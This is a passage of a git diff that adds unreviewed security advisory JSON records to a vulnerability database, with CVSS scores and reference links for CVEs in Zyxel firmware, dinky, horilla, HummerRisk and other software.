"2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2025-9120" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in OpenText™ Carbonite Safe Server Backup allows Code Injection. \n\nThe vulnerability could be exploited through an open port, potentially allowing unauthorized access.\n\nThis issue affects Carbonite Safe Server Backup: through 6.8.3.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9120" + }, + { + "type": "WEB", + "url": "https://support.carbonite.com/articles/Security-Bulletin-for-Carbonite-Safe-Server-Backup-09-12-2025" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T01:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json b/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json new file mode 100644 index 0000000000000..f999ebc08ab1a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-934v-v4wh-rf2c", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2025-13942" + ], + "details": "A command injection vulnerability in the UPnP function of the Zyxel EX3510-B0 firmware versions through 5.17(ABUP.15.1)C0 could allow a remote attacker to execute operating system (OS) commands on an affected device by sending specially crafted UPnP SOAP requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13942" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json b/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json new file mode 100644 index 0000000000000..c486980d6d2ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cqj6-j4f4-mcpp", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2026-3049" + ], + "details": "A vulnerability was detected in horilla-opensource horilla up to 1.0.2. This issue affects the function get of the file horilla_generics/global_search.py of the component Query Parameter Handler. The manipulation of the argument prev_url results in open redirect. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 1.0.3 is capable of addressing this issue. The patch is identified as 730b5a44ff060916780c44a4bdbc8ced70a2cd27. The affected component should be upgraded.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3049" + }, + { + "type": "WEB", + "url": "https://github.com/horilla-opensource/horilla-crm/commit/730b5a44ff060916780c44a4bdbc8ced70a2cd27" + }, + { + "type": "WEB", + "url": "https://github.com/Stolichnayer/Horilla-CRM-Open-Redirect" + }, + { + "type": "WEB", + "url": "https://github.com/horilla-opensource/horilla-crm/releases/tag/1.0.3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347407" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347407" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757296" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T01:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json b/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json new file mode 100644 index 0000000000000..c72a5f61b9c52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f256-j3x2-h7wh", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2026-3051" + ], + "details": "A vulnerability has been found in DataLinkDC dinky up to 1.2.5. The affected element is the function getProjectDir of the file dinky-admin/src/main/java/org/dinky/utils/GitRepository.java of the component Project Name Handler. Such manipulation of the argument projectName leads to path traversal. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3051" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/5" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/5#issue-3935000629" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347409" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347409" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T01:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json b/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json new file mode 100644 index 0000000000000..d1a51ec968b1c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fj46-cfm8-7pc4", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3091" + ], + "details": "An uncontrolled search path element vulnerability in Synology Presto Client before 2.1.3-0672 allows local users to read or write arbitrary files during installation by placing a malicious DLL in advance in the same directory as the installer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3091" + }, + { + "type": "WEB", + "url": "https://www.synology.com/en-global/security/advisory/Synology_SA_26_02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json b/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json new file mode 100644 index 0000000000000..90ad501c5d4be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8fj-fqgq-fj22", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2025-11848" + ], + "details": "A null pointer dereference vulnerability in the Wake-on-LAN CGI program of the Zyxel VMG3625-T50B firmware version through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11848" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json b/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json new file mode 100644 index 0000000000000..6dc2cee150369 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg73-f2jm-wph7", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2025-13943" + ], + "details": "A post-authentication command injection vulnerability in the log file download function of the Zyxel EX3301-T0 firmware versions through 5.50(ABVY.7)C0 could allow an authenticated attacker to execute operating system (OS) commands on an affected device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13943" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json b/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json new file mode 100644 index 0000000000000..532005eb8a25f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhmq-843h-9vq8", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2025-11847" + ], + "details": "A null pointer dereference vulnerability in the IP settings CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11847" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json b/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json new file mode 100644 index 0000000000000..c02024c28c159 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8mv-7fwh-cfvr", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2025-11846" + ], + "details": "A null pointer dereference vulnerability in the account settings CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11846" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T02:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json b/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json new file mode 100644 index 0000000000000..e841a8af248ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2vh-hr2h-f29r", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3052" + ], + "details": "A vulnerability was found in DataLinkDC dinky up to 1.2.5. The impacted element is the function proxyUba of the file dinky-admin/src/main/java/org/dinky/controller/FlinkProxyController.java of the component Flink Proxy Controller. Performing a manipulation results in server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3052" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/7" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/7#issue-3935032160" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347410" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347410" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757587" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T02:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json b/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json new file mode 100644 index 0000000000000..d89487c5eed06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq86-4hgw-x482", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3065" + ], + "details": "A vulnerability was detected in HummerRisk up to 1.5.0. This affects the function CommandUtils.commonExecCmdWithResult of the file CloudTaskService.java of the component Cloud Task Dry-run. Performing a manipulation of the argument fileName results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3065" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347416" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347416" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757696" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json b/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json new file mode 100644 index 0000000000000..dc1c447ee3389 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv96-h3xf-q33j", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2026-3050" + ], + "details": "A flaw has been found in horilla-opensource horilla up to 1.0.2. Impacted is an unknown function of the file static/assets/js/global.js of the component Leads Module. This manipulation of the argument Notes causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. Upgrading to version 1.0.3 is recommended to address this issue. Patch name: fc5c8e55988e89273012491b5f097b762b474546. It is suggested to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3050" + }, + { + "type": "WEB", + "url": "https://github.com/Horilla-opensource/Horilla-crm/commit/fc5c8e55988e89273012491b5f097b762b474546" + }, + { + "type": "WEB", + "url": "https://github.com/Stolichnayer/Horilla-CRM-Stored-XSS" + }, + { + "type": "WEB", + "url": "https://github.com/horilla-opensource/horilla-crm/releases/tag/1.0.3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347408" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347408" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757314" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T01:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json b/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json new file mode 100644 index 0000000000000..e0acffbf3a307 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w3pf-j6xr-fj68", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3053" + ], + "details": "A vulnerability was determined in DataLinkDC dinky up to 1.2.5. This affects the function addInterceptors of the file dinky-admin/src/main/java/org/dinky/configure/AppConfig.java of the component OpenAPI Endpoint. Executing a manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3053" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/6" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/6#issue-3935019636" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347411" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347411" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757589" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T02:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json b/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json new file mode 100644 index 0000000000000..5cf82da0511d9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6c4-87pg-m84f", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-1459" + ], + "details": "A post-authentication command injection vulnerability in the TR-369 certificate download CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.7)C0 could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on an affected device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1459" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json b/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json new file mode 100644 index 0000000000000..819c1eaacc4a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqg5-5x64-93r9", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3057" + ], + "details": "A security flaw has been discovered in a54552239 pearProjectApi up to 2.8.10. Affected is the function dateTotalForProject of the file application/common/Model/Task.php of the component Backend Interface. The manipulation of the argument projectCode results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3057" + }, + { + "type": "WEB", + "url": "https://github.com/XiaoyuZhou1997/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/XiaoyuZhou1997/CVE/issues/1#issue-3935708166" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347413" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347413" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757669" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:03Z" + } +} \ No newline at end of file From 98d385712accc53e02160f5088f640e85318b307 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 06:32:45 +0000 Subject: [PATCH 74/77] Publish Advisories GHSA-325g-f49v-c2hf GHSA-33jh-2f37-89xc GHSA-3h23-rfwm-gcx3 GHSA-4268-mm99-gpjc GHSA-52cp-m58w-wp9x GHSA-5c5w-4x77-3vjh GHSA-9wrx-vcj7-gm99 GHSA-g8f3-f559-737f GHSA-gm3m-q82f-958h GHSA-hhp2-jq65-cjxx GHSA-m5wr-8mwj-cqpw GHSA-r22q-wf27-426v GHSA-rw74-fqrf-pr2q GHSA-vjgx-vcpf-hm6w GHSA-3grc-c2rj-3qj5 GHSA-83rq-88jr-634x GHSA-cxmx-5wwh-7p77 GHSA-fwq6-2c4r-9g8h GHSA-mcwp-v5q8-7gcp GHSA-p86v-p9g7-fffw GHSA-rx2f-c6vf-gmg2 GHSA-wgpr-jxrq-2m57 --- 